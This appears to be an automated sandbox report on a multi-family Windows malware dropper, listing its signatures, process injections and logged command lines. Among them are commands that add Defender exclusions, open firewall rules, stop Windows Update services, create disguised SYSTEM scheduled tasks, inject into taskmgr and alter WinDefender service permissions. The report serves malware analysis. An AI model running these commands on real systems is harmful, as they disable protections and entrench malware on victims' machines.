Malware Analysis Report

2024-12-08 01:19

Sample ID 231111-mh6dxade6w
Target NEAS.5d5380e1ec3580484f3bd5559f3104531e7cc9462b4d4c3ea02a862ca5b7c70f.exe
SHA256 5d5380e1ec3580484f3bd5559f3104531e7cc9462b4d4c3ea02a862ca5b7c70f
Tags
glupteba mystic redline sectoprat smokeloader zgrat pixelnew2.0 taiga up3 backdoor dropper evasion infostealer loader persistence rat stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5d5380e1ec3580484f3bd5559f3104531e7cc9462b4d4c3ea02a862ca5b7c70f

Threat Level: Known bad

The file NEAS.5d5380e1ec3580484f3bd5559f3104531e7cc9462b4d4c3ea02a862ca5b7c70f.exe was found to be: Known bad.

Malicious Activity Summary

SectopRAT

Glupteba payload

RedLine

Detect Mystic stealer payload

ZGRat

RedLine payload

SmokeLoader

Mystic

Glupteba

Detect ZGRat V1

SectopRAT payload

Downloads MZ/PE file

Modifies Windows Firewall

Stops running service(s)

Executes dropped EXE

Checks computer location settings

UPX packed file

Adds Run key to start application

Suspicious use of SetThreadContext

Launches sc.exe

Unsigned PE

Program crash

Enumerates physical storage devices

Creates scheduled task(s)

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

Checks SCSI registry key(s)

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-11-11 10:28

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-11-11 10:28

Reported

2023-11-11 10:31

Platform

win10v2004-20231020-en

Max time kernel

46s

Max time network

136s

Command Line

"C:\Users\Admin\AppData\Local\Temp\NEAS.5d5380e1ec3580484f3bd5559f3104531e7cc9462b4d4c3ea02a862ca5b7c70f.exe"

Signatures

Detect Mystic stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Mystic

stealer mystic

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7iA7Fq05.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\NEAS.5d5380e1ec3580484f3bd5559f3104531e7cc9462b4d4c3ea02a862ca5b7c70f.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Pd6hs45.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\tB0jz14.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2pe5289.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2pe5289.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2pe5289.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2pe5289.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2pe5289.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2pe5289.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2796 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5d5380e1ec3580484f3bd5559f3104531e7cc9462b4d4c3ea02a862ca5b7c70f.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Pd6hs45.exe
PID 2796 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5d5380e1ec3580484f3bd5559f3104531e7cc9462b4d4c3ea02a862ca5b7c70f.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Pd6hs45.exe
PID 2796 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5d5380e1ec3580484f3bd5559f3104531e7cc9462b4d4c3ea02a862ca5b7c70f.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Pd6hs45.exe
PID 2168 wrote to memory of 3488 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Pd6hs45.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\tB0jz14.exe
PID 2168 wrote to memory of 3488 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Pd6hs45.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\tB0jz14.exe
PID 2168 wrote to memory of 3488 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Pd6hs45.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\tB0jz14.exe
PID 3488 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\tB0jz14.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1QI06ok4.exe
PID 3488 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\tB0jz14.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1QI06ok4.exe
PID 3488 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\tB0jz14.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1QI06ok4.exe
PID 1200 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1QI06ok4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1200 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1QI06ok4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1200 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1QI06ok4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1200 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1QI06ok4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1200 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1QI06ok4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1200 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1QI06ok4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1200 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1QI06ok4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1200 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1QI06ok4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1200 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1QI06ok4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1200 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1QI06ok4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3488 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\tB0jz14.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2pe5289.exe
PID 3488 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\tB0jz14.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2pe5289.exe
PID 3488 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\tB0jz14.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2pe5289.exe
PID 2168 wrote to memory of 444 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Pd6hs45.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Qo3Av6.exe
PID 2168 wrote to memory of 444 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Pd6hs45.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Qo3Av6.exe
PID 2168 wrote to memory of 444 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Pd6hs45.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Qo3Av6.exe
PID 444 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Qo3Av6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 444 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Qo3Av6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 444 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Qo3Av6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 444 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Qo3Av6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 444 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Qo3Av6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 444 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Qo3Av6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 444 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Qo3Av6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 444 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Qo3Av6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 444 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Qo3Av6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 444 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Qo3Av6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 444 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Qo3Av6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2796 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5d5380e1ec3580484f3bd5559f3104531e7cc9462b4d4c3ea02a862ca5b7c70f.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7iA7Fq05.exe
PID 2796 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5d5380e1ec3580484f3bd5559f3104531e7cc9462b4d4c3ea02a862ca5b7c70f.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7iA7Fq05.exe
PID 2796 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5d5380e1ec3580484f3bd5559f3104531e7cc9462b4d4c3ea02a862ca5b7c70f.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7iA7Fq05.exe
PID 3004 wrote to memory of 3920 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7iA7Fq05.exe C:\Windows\SysWOW64\cmd.exe
PID 3004 wrote to memory of 3920 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7iA7Fq05.exe C:\Windows\SysWOW64\cmd.exe
PID 3004 wrote to memory of 3920 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7iA7Fq05.exe C:\Windows\SysWOW64\cmd.exe
PID 3184 wrote to memory of 4780 N/A N/A C:\Users\Admin\AppData\Local\Temp\4C94.exe
PID 3184 wrote to memory of 4780 N/A N/A C:\Users\Admin\AppData\Local\Temp\4C94.exe
PID 3184 wrote to memory of 4780 N/A N/A C:\Users\Admin\AppData\Local\Temp\4C94.exe
PID 3184 wrote to memory of 3512 N/A N/A C:\Users\Admin\AppData\Local\Temp\4DFD.exe
PID 3184 wrote to memory of 3512 N/A N/A C:\Users\Admin\AppData\Local\Temp\4DFD.exe
PID 3184 wrote to memory of 3512 N/A N/A C:\Users\Admin\AppData\Local\Temp\4DFD.exe

Processes

C:\Users\Admin\AppData\Local\Temp\NEAS.5d5380e1ec3580484f3bd5559f3104531e7cc9462b4d4c3ea02a862ca5b7c70f.exe

"C:\Users\Admin\AppData\Local\Temp\NEAS.5d5380e1ec3580484f3bd5559f3104531e7cc9462b4d4c3ea02a862ca5b7c70f.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Pd6hs45.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Pd6hs45.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\tB0jz14.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\tB0jz14.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1QI06ok4.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1QI06ok4.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2pe5289.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2pe5289.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3436 -ip 3436

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3436 -s 192

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Qo3Av6.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Qo3Av6.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7iA7Fq05.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7iA7Fq05.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\is64.bat" "

C:\Users\Admin\AppData\Local\Temp\4C94.exe

C:\Users\Admin\AppData\Local\Temp\4C94.exe

C:\Users\Admin\AppData\Local\Temp\4DFD.exe

C:\Users\Admin\AppData\Local\Temp\4DFD.exe

C:\Users\Admin\AppData\Local\Temp\6697.exe

C:\Users\Admin\AppData\Local\Temp\6697.exe

C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\6ABE.exe

C:\Users\Admin\AppData\Local\Temp\6ABE.exe

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\6FEF.exe

C:\Users\Admin\AppData\Local\Temp\6FEF.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\6ABE.exe

C:\Users\Admin\AppData\Local\Temp\6ABE.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc …

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Roaming\Tags\Settings.exe

C:\Users\Admin\AppData\Roaming\Tags\Settings.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Users\Admin\AppData\Local\Temp\29EA.exe

C:\Users\Admin\AppData\Local\Temp\29EA.exe

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"

C:\Users\Admin\AppData\Local\Temp\6D0E.exe

C:\Users\Admin\AppData\Local\Temp\6D0E.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\AppData\Local\Temp\8DE5.exe

C:\Users\Admin\AppData\Local\Temp\8DE5.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe" --nt-service -f "C:\Users\Admin\AppData\Local\Temp\csrss\tor\torrc" --Log "notice file C:\Users\Admin\AppData\Local\Temp\csrss\tor\log.txt"

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

